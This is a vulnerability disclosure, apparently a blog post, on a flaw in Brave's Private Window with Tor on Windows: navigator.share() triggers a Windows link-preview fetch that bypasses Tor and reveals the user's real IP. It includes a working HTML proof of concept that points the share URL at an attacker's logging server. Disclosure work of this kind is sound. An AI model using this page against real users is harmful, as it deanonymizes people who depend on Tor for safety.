Brave Tor IP Leak via navigator.share()
Today we’re going to dive into a privacy vulnerability we found in 2025 in Brave Browser’s Private Window with Tor, where a user’s real IP address is leaked when using the navigator.share() Web API.
Summary
A user’s real IP address is leaked when using the navigator.share() Web API inside a Private Window with Tor. Triggering the share functionality opens the native Windows Share UI, which then attempts to fetch a link preview of the shared URL. This preview request is made over the user’s real network connection, completely bypassing the Tor proxy and deanonymizing the user to the server hosting the URL.
A malicious website can abuse this by tricking a user into clicking a share button, causing the user’s real IP to be sent to a server controlled by the attacker. This vulnerability undermines the core privacy promise of Brave’s Tor integration.
Products affected
- Brave Browser: v1.81.136 & latest nightly as of 27/08/2025
- Operating System: Windows 11 (likely affects Windows 10 as well)
- Feature: Private Window with Tor
Steps To Reproduce
- Attacker Setup: Start a simple web server on a public IP address (
<YOUR_SERVER_IP>) that logs all incoming HTTP requests and their source IP addresses. - Attacker Page: Create a simple HTML page with a button that triggers
navigator.share(), pointing to the server from step 1.
<!DOCTYPE html>
<html>
<head>
<title>Share Test</title>
</head>
<body>
<button id="shareButton">Share Me</button>
<script>
document.getElementById('shareButton').addEventListener('click', async () => {
try {
await navigator.share({
title: 'Test',
text: 'Check out this page.',
url: 'http://<YOUR_SERVER_IP>/REALIP/' // URL pointing to your logging server
});
console.log('Shared successfully');
} catch (err) {
console.error('Share failed:', err.message);
}
});
</script>
</body>
</html>
- Victim Action: Open Brave Browser and open a new Private Window with Tor.
- In the Tor window, navigate to the HTML page created in step 2.
- Click the “Share Me” button. The native Windows Share UI will appear.
- Verification: Check the logs on your web server from step 1. You will see an incoming request for
/REALIP/from the user’s real IP address, not from a Tor exit node.
Expected Result
The share dialog should either not generate a link preview, or it should fetch the preview content through the active Tor connection to preserve the user’s anonymity. No network requests should originate from the user’s real IP address.
Actual Result
The Windows Share UI is invoked and it makes a direct network request to the specified URL to generate a rich preview. This request bypasses Brave’s Tor proxy, leaking the user’s real IP address to the destination server.
Supporting Material/References
The root cause of this vulnerability is that the navigator.share() implementation hands off the URL to the underlying operating system’s sharing mechanism. This OS-level component (the Windows Shell) is not aware of or configured to use the browser’s Tor proxy for its network requests. It operates outside of the browser’s sandboxed network environment, thus making a direct connection.
Impact
The impact of this vulnerability is severe as it directly leaks the user’s real IP address.
This completely deanonymizes the user and defeats the primary purpose of using a Private Window with Tor. Any website can exploit this behavior to identify a user who believes their connection is anonymous, fundamentally breaking the feature’s core privacy guarantee.
534 Words
2026-08-21 11:37